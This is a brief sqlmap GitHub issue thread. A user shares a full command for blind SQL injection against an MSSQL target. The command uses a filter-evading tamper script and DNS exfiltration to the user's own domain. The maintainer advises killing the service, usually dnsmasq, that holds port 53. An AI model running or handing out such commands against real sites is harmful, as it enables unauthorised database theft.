### ISSUE TITLE
DNS exfiltration attack

### ISSUE THREAD

**Issue by Comancheroo** [sqlmapproject/sqlmap#1746]
Hello,

I use to VPS (debian + plesk panel) and I have a domain on vps server.
I want blind injection with DNS exfiltration attack. But sqlmap gives the following error;

"[CRITICAL] there was an error while setting up DNS server instance ('another DNS service already running on *:53')"

My query;
sudo python sqlmap.py -u "site.com" --tamper "space2randomblank.py" --random-agent --dbms=mssql --technique=B -D database --tables --dns-domain=abc.xyz

Thanks.

**Comment by stamparm** [comment]
Find a service that is running on that port and kill it. Usually it is a dnsmasq
